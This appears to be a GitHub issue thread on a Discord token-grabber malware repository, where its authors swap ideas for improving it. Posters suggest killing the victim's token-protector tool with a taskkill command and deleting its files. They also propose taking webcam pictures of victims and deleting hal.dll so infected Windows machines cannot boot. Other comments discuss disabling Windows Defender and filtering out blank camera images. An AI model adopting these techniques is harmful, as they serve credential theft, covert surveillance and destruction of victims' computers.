### ISSUE TITLE
Helping u out cuzzo

### ISSUE THREAD

**Issue by KDot227** [Smug246/Luna-Token-Grabber#55]
Bypass Token Protector = taskkill /F /IM discordtokenprotector.exe or whatever the name is. Then edit the file where all the settings are stored and disable everything and also delete all the other important files if they exist (dm me if u need help) (its in my grabber too so u can just check)

WebCam Screenshot (optional) = https://i.imgur.com/DE6pWaQ.png

binder = idk 💀

**Comment by KDot227** [comment]
also if u wanna be a bitch have it delete hal.dll 💀

**Comment by Smug246** [comment]
what's hal.dll

**Comment by Blank-c** [comment]
> what's hal.dll

Deleting it would crash the startup process and the device will not start. Basically destroy a window.

**Comment by KDot227** [comment]
> @KDot227 pygame itself is very big, it would increase the file size a lot I presume. 

It's a LOT smaller than open cv. I'll try and find other ways or I'll just make my own at this point.

**Comment by Blank-c** [comment]
Maybe the way I use might help, check out my grabber

**Comment by KDot227** [comment]
@Smug246 ill have it done by end of day prolly

**Comment by Blank-c** [comment]
> > Maybe the way I use might help, check out my grabber
> 
> ![image](https://user-images.githubusercontent.com/99215486/201154461-b3d2abf9-7920-4fb0-8545-b5385cd1e878.png) what does this do

checks if the image have only one color. Like sometime when the person use a virtual cam which is off. Their image is just a random solid color. This checks if an image is one such image or not.

**Comment by KDot227** [comment]
Dang

**Comment by Smug246** [comment]
> > > Maybe the way I use might help, check out my grabber
> > 
> > 
> > ![image](https://user-images.githubusercontent.com/99215486/201154461-b3d2abf9-7920-4fb0-8545-b5385cd1e878.png) what does this do
> 
> checks if the image have only one color. Like sometime when the person use a virtual cam which is off. Their image is just a random solid color. This checks if an image is one such image or not.

smart

**Comment by Blank-c** [comment]
@Smug246 Try to use BlankGrabber, who knows you may find something nice that you wanna add.

**Comment by KDot227** [comment]
bro just needa self ad

**Comment by Blank-c** [comment]
> bro just needa self ad

Ye, so whats wrong with it? It isn't like I am just giving advertisement and doing nothing...

I am helping too bro

**Comment by Blank-c** [comment]
@Smug246 

https://github.com/Smug246/Luna-Token-Grabber/blob/main/luna.py#L107

I think the command no longer turns off windows defender.

**Comment by Smug246** [comment]
i tested it before and it works ill look again

**Comment by Smug246** [comment]
i got what i need out of this
